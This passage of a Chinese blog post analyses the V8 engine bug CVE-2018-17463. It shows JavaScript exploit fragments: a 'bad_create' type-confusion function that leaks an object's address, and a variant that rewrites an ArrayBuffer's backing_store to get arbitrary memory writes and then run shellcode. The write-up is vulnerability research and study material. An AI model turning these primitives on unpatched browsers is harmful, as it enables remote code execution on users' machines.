<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> a1 = &#123;<span class="attr">x</span> : <span class="number">1</span>,<span class="attr">y</span>:<span class="number">2</span>,<span class="attr">z</span>:<span class="number">3</span>&#125;;</span><br><span class="line">a1.b = <span class="number">4</span>;</span><br><span class="line">a1.c = <span class="number">5</span>;</span><br><span class="line">a1.d = <span class="number">6</span>;</span><br><span class="line"><span class="keyword">let</span> a2 = &#123;<span class="attr">x</span> : <span class="number">2</span>,<span class="attr">y</span>:<span class="number">3</span>,<span class="attr">z</span>:<span class="number">4</span>&#125;;</span><br><span class="line">a2.b = <span class="number">7</span>;</span><br><span class="line">a2.c = <span class="number">8</span>;</span><br><span class="line">a2.d = <span class="number">9</span>;</span><br><span class="line"><span class="built_in">Object</span>.create(a1);</span><br><span class="line">%DebugPrint(a1);</span><br><span class="line"><span class="built_in">Object</span>.create(a2);</span><br><span class="line">%DebugPrint(a2);</span><br><span class="line">readline();</span><br></pre></td></tr></table></figure>
<p><img src="http://sz.guiu.xyz/images/image-20200414154238022cfa426a0c693c0de.png" alt="image-20200414154238022"></p>
<p>那么就很简单了，把每次执行的所有属性值记下来，然后当触发漏洞时，根据属性值找到对应的属性名，即确定了一对在属性改变前后可以对应的属性名，以达到恶意函数返回<code>a.x1</code>，实质上是返回<code>a.x2</code>的目的。</p>
<p>假设上面得到的键值对为<code>X</code>和<code>Y</code>。则构建一个全新的<code>Object</code>：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">o.X = &#123;<span class="attr">x1</span>:<span class="number">1.1</span>,<span class="attr">x2</span>:<span class="number">1.2</span>&#125;;</span><br><span class="line">o.Y = &#123;<span class="attr">y1</span>:obj&#125;;</span><br></pre></td></tr></table></figure>
<p>并且构造恶意函数：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">bad_create</span>(<span class="params">o</span>)</span>&#123;</span><br><span class="line">    o.a;</span><br><span class="line">    <span class="keyword">this</span>.Object.create(o);</span><br><span class="line">    <span class="keyword">return</span> o.X.x1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>很容易理解，当<code>bad_create()</code>返回<code>o.X.x1</code>时，由于漏洞的存在，实际返回的应该是<code>o.Y.y1</code>，即为<code>obj</code>的地址。</p>
<p>拿到了地址，接下来向对应地址写入<code>shellcode</code>即可实现漏洞利用。</p>
<h3 id="任意地址写操作"><a class="header-anchor" href="#任意地址写操作"></a>任意地址写操作</h3>
<p>利用<code>ArrayBuffer</code>对象，通过漏洞链修改<code>ArrayBuffer</code>的<code>backing_store</code>属性，从而实现任意地址的写操作。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">bad_create</span>(<span class="params">o,value</span>)</span>&#123;</span><br><span class="line">            o.a;</span><br><span class="line">            <span class="keyword">this</span>.Object.create(o);</span><br><span class="line">            <span class="keyword">let</span> ret = o.$&#123;X&#125;.x0.x2;</span><br><span class="line">             o.$&#123;X&#125;.x0.x2 = value;</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>只需要构造一个<code>ArrayBuffer</code>对象<code>o</code>，当我们对<code>x0.x2</code>进行赋值操作的时候，由于漏洞的存在，实际上我们改变的是<code>ArrayBuffer</code>的<code>backing_store</code>属性。</p>
<p>之后，不断的利用该<code>ArrayBuffer</code>对象，泄露并修改其<code>backing_store</code>成员指向待读写区域，最终执行我们放到该内存区域的<code>shellcode</code>。</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>guiu
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://guiu.xyz/p/9e20141d.html" title="V8引擎CVE-2018-17463漏洞分析记录--记一道新奇的面试题">http://guiu.xyz/p/9e20141d.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/p/ab70f304.html" rel="prev" title="python编写typora插件实现传图到chevereto">
      <i class="fa fa-chevron-left"></i> python编写typora插件实现传图到chevereto
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number">1.</span> <span class="nav-text">搜集资料</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number">2.</span> <span class="nav-text">准备环境</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#安装depot-tools"><span class="nav-number">2.1.</span> <span class="nav-text">安装depot_tools</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#构建v8引擎"><span class="nav-number">2.2.</span> <span class="nav-text">构建v8引擎</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#踩坑记录"><span class="nav-number">2.2.1.</span> <span class="nav-text">踩坑记录</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#null"><span class="nav-number">3.</span> <span class="nav-text">开始分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#调试v8引擎"><span class="nav-number">3.1.</span> <span class="nav-text">调试v8引擎</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#v8引擎调试环境："><span class="nav-number">3.1.1.</span> <span class="nav-text">v8引擎调试环境：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞原因分析："><span class="nav-number">3.2.</span> <span class="nav-text">漏洞原因分析：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用"><span class="nav-number">3.3.</span> <span class="nav-text">利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用步骤"><span class="nav-number">3.3.1.</span> <span class="nav-text">利用步骤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#验证poc"><span class="nav-number">3.3.2.</span> <span class="nav-text">验证poc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#任意地址写操作"><span class="nav-number">3.3.3.</span> <span class="nav-text">任意地址写操作</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="guiu"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">guiu</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">31</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        
<div class="copyright">
  <span><a href="http://www.beian.miit.gov.cn/" rel="noopener" target="_blank">蜀ICP备19032161号-1 </a>
  </span>
  <span class="post-meta-divider">|</span>


  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2020</span>

  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guiu</span>

</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.7.1
  </div>

        
<div class="busuanzi-count">
 <!--修复busuanzi有时候无法显示的问题，这里注释掉，改用本地js-->
   <!--<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>-->
  <script async src="/js/cursor/busuanzi_fix.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  


  <script async src="https://script-1256884783.file.myqcloud.com/cursor/fireworks.js"></script>



  
<script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"left","width":100,"height":180},"mobile":{"show":false},"react":{"opacityDefault":0.7}});</script></body>
</html>
